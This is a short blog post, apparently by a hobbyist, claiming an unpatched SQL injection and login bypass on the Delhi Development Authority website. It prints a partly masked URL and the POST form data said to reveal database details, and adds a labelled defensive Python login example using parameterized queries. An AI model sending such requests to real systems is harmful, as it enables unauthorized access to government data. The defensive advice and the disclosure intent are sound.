Hello friends,

Just to show how secure government websites are: one user used my Notepad Utility to share this report of a vulnerability inside the Delhi Development Authority (DDA).

[Image: dda hacked]

I was surprised, then decided to check whether this is true or not. You will also be surprised to know that the website has SQLi issues; anyone can easily bypass the login from http://dda.org.in/news/xxxxx.xxxx.

For developers: validation on the client side is not enough; for better security, always implement server-side validation.
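What server-side handling of a login form can look like, as an added example that is not code from this site or from the original post. It is written in Python with an in-memory SQLite table as a stand-in for the real backend; the field names `txtUserName` and `txtPwd` come from the form data in this post, while the table layout, sample account and username policy are assumptions.

```python
import hashlib
import hmac
import os
import re
import sqlite3

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")  # assumed allow-list policy
PBKDF2_ROUNDS = 100_000


def hash_password(password, salt):
    """Salted PBKDF2-SHA256 so the table never stores plaintext passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db():
    """Constructed in-memory user table holding one sample account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("editor1", salt, hash_password("correct horse battery", salt)))
    return db


def validate_form(form):
    """Server-side checks, applied no matter what the browser already checked."""
    user, pwd = form.get("txtUserName"), form.get("txtPwd")
    if not isinstance(user, str) or not isinstance(pwd, str):
        return None
    if not USERNAME_RE.fullmatch(user) or not 1 <= len(pwd) <= 128:
        return None
    return user, pwd


def login(db, form):
    """Return True only for a known user with the matching password."""
    checked = validate_form(form)
    if checked is None:
        return False
    user, pwd = checked
    # Placeholders keep the submitted values as data; they never become SQL text.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison of the derived hash against the stored one.
    return hmac.compare_digest(hash_password(pwd, salt), stored)
```

The allow-list rejects malformed usernames early, but the parameterized query is what prevents injection: passwords are free-form and still reach the database only as bound values.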

Not only this, one can also access DB details by sending a POST request to the above URL with the following data:

btnSubmit=LOGIN&txtPwd=%Unknowndevice64%&txtUserName=vlxnxbpo&__EVENTARGUMENT=&__EVENTTARGET=
&__EVENTVALIDATION=%2fwEWBAKoz9SSBwKl1bKzCQKd%2b7qdDgLCi9reA%2f8JyAWU3s2qH%2bFHVMZdvhg2aUK3
&__VIEWSTATE=%2fwEPDwULLTEwNTcyMzk5NDlkZO0XsWIGH%2b3ANqG9DeG61OFqN6qo

Hope the authority will patch this security hole soon :)
